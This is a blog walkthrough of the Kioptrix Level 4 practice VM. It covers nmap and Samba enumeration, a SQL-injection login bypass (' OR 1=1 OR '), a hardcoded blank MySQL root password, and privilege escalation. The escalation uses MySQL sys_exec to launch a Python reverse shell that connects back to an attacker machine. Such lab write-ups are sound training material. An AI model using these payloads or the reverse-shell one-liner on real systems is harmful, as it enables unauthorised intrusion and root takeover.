Total Pageviews

Sunday, August 8, 2021

KIOPTRIX SERIES PENTEST : WalKthrough level [IV]

 

KIOPTRIX LAB LEVEL [IV]



You can find all the penetration testing process of this machine, on the following video: 








Complete walkthrough, of the season content:

RECOGNITION PHASE:

NETWORK DISCOVERY:

We can use a couple of tools  in order to make this task, ane of them is arp-scan that use request over arp protocol on broadcast mode, and wait for the hosts response via this type of protocol  as you can see below:




The other tool is  netdiscover, with the same concept but using an interface like parameter:





NMAP:

On this step, from the attaker machine we recover information about the open ports and services of out target machine. We can use some options in order to execute scripts and obtain information about vulnerabilities on the external host.

nmap -sC -sV -T4 -n 192.168.1.54 -v
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 19:25 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Initiating ARP Ping Scan at 19:25
Scanning 192.168.1.54 [1 port]
Completed ARP Ping Scan at 19:25, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:25
Scanning 192.168.1.54 [1000 ports]
Discovered open port 80/tcp on 192.168.1.54
Discovered open port 22/tcp on 192.168.1.54
Discovered open port 139/tcp on 192.168.1.54
Discovered open port 445/tcp on 192.168.1.54
Completed SYN Stealth Scan at 19:25, 3.31s elapsed (1000 total ports)
Initiating Service scan at 19:25
Scanning 4 services on 192.168.1.54
Completed Service scan at 19:26, 11.02s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.1.54.
Initiating NSE at 19:26
Completed NSE at 19:26, 15.12s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.01s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Nmap scan report for 192.168.1.54
Host is up (0.00054s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 40:EC:99:C9:FC:2F (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|_  WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2021-08-11T15:26:11-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

NSE: Script Post-scanning.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap

    
The conclusion of nmap scan is that we found the following open ports with the services:

cat target_nmap | grep open
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

The following script enumerate the users on samba service that probably bleong to the operative system:

nmap --script=smb-enum-users 192.168.1.54
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 19:57 CEST
Nmap scan report for 192.168.1.54
Host is up (0.0012s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 40:EC:99:C9:FC:2F (Intel Corporate)

Host script results:
| smb-enum-users: 
|   KIOPTRIX4\john (RID: 3002)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\loneferret (RID: 3000)
|     Full name:   loneferret,,,
|     Flags:       Normal user account
|   KIOPTRIX4\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Normal user account
|   KIOPTRIX4\robert (RID: 3004)
|     Full name:   ,,,
|     Flags:       Normal user account
|   KIOPTRIX4\root (RID: 1000)
|     Full name:   root
|_    Flags:       Normal user account

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds


EXPLOTATION:

On the exploitation phase we are going to check all services and versions that there are open on the victim machine.

22: shh


The service is alive and worked as expected, but we haven't the user and credential for access.

80: http



On the http service we found a web page hosted on the server. In the following lines we review the process for comonli exploiting a webpage, without automatics tools:

1. Server recognition:

whatweb http://192.168.1.54
http://192.168.1.54 [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.1.54], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

2. Crawling for common directories:



There are util information, about the application users : john or robert. 
And the login is validate in a php file that allow two params using POST request method, myusername/mypassword





3. Reviewing common vulnerabilities and misconfiguration detected:

nikto -host 192.168.1.54
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.54
+ Target Hostname:    192.168.1.54
+ Target Port:        80
+ Start Time:         2021-08-11 20:06:50 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 12:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-08-11 20:07:30 (GMT2) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. Exploiting the login:

myusername: john
mypassword: '


The information error disclosure said that "found an error on mysql_num_rows()"


myusername: john
mypassword: ' OR 1=1 OR '


Why? Because the php code is vulnerable to sql injection and could be look like that on the server side:

$sql = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $_POST['password'] . "';" ; $result = mysqli_query($link, $sql); if (mysql_num_rows($result) > 0) { // User is authenticated... } else { // User not found }

In this case with our injection the database query should be:

SELECT * FROM users WHERE username='john' AND password='' OR 1 =1 OR ''; 

Local PoC:

mysql> create database db_injection;
Query OK, 1 row affected (0,01 sec)

mysql> use db_injection;
Database changed

mysql> CREATE TABLE IF NOT EXISTS users (
    ->     usr_id INT AUTO_INCREMENT PRIMARY KEY,
    ->     user VARCHAR(20) NOT NULL,
    ->     password varchar(20) NOT NULL
    -> );
Query OK, 0 rows affected (0,01 sec)

mysql> insert into users values (null,'robert','Mycredentials');
Query OK, 1 row affected (0,02 sec)

mysql> insert into users values (null,'f0ns1','Mycredentials');
Query OK, 1 row affected (0,01 sec)

mysql> insert into users values (null,'jhon','Mycredentials');
Query OK, 1 row affected (0,02 sec)


mysql> select * from users;
+--------+--------+---------------+
| usr_id | user   | password      |
+--------+--------+---------------+
|      1 | robert | Mycredentials |
|      2 | f0ns1  | Mycredentials |
|      3 | jhon   | Mycredentials |
+--------+--------+---------------+
3 rows in set (0,01 sec)

And finally the injection:


The number of rows of the result is > 0:

SELECT * FROM users WHERE user='jhon' AND password='' OR 1 =1 OR ''; 
+--------+--------+---------------+
| usr_id | user   | password      |
+--------+--------+---------------+
|      1 | robert | Mycredentials |
|      2 | f0ns1  | Mycredentials |
|      3 | jhon   | Mycredentials |
+--------+--------+---------------+
3 rows in set (0,00 sec)

Obtaining the credentials for robert:

myusername: robert
mypassword: ' OR 1=1 OR '

 

5. Obtaining a session on server:

Using the ssh service with the previous account and credentials, we can access to the target host. But....


As you can see in the previous image this is a restricted shell.
When you type help the operating system said you the allowed binaries to execute.

robert:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

How to bypass restricted shell:



Privilege Escalation:

1.Obtaining information from php code:

robert@Kioptrix4:/var/www$ cat checklogin.php | grep Mysql   
$username="root"; // Mysql username
$password=""; // Mysql password
// Mysql_num_row is counting table row





2. Spawning a reverse shell with root permissions  from mysql:

2.1. Mysql connection as root user from localhost:

mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use members;

2.2. Executing command on operating system with root privileges:
The following command spawn a reverse shell with python by itself:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.42",8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Using sys_exec plugin/function:
mysql> select sys_exec('ls');
+----------------+
| sys_exec('ls') |
+----------------+
| NULL           | 
+----------------+
1 row in set (0.00 sec)

Using the plugin with the command:

mysql> select sys_exec("python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.42\",8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'");


3. Listen on port 8989 on attacker machine:



This execution is possible with administration rights, because the plugin sys_exec function is enabled with root permissions.



OS dynamic library permissions:




And this is all for this lab level, I hope that you enjoy with the kioptrix serias, 
follow my blog [https://roadtooscp-f0ns1.blogspot.com/] and we'll keep in touch.

with kind regards, f0ns1


at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...